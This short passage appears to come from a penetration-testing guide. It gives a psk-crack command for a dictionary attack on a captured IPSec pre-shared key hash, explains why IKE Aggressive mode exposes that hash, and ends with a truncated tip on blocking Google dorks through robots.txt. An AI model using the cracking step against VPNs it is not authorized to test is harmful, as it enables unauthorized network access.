psk-crack -d /path/to/dictionary /path/to/pskkey


In Aggressive mode, the authentication hash is transmitted as a response to the packet of the VPN client that tries to establish a connection tunnel (IPSec). This hash is not encrypted and hence it allows us to capture the hash and perform a brute force attack against it to recover our PSK.

This is not possible in Main mode, as it uses an encrypted hash along with a 6-way handshake, whereas Aggressive mode uses only a 3-way handshake.

Prevent outsiders from using these Google dorks against your web systems

 Modifying the robots.txt file in your server, as follows: • Prevent indexing from Google by running the following code:  User-agent: Google...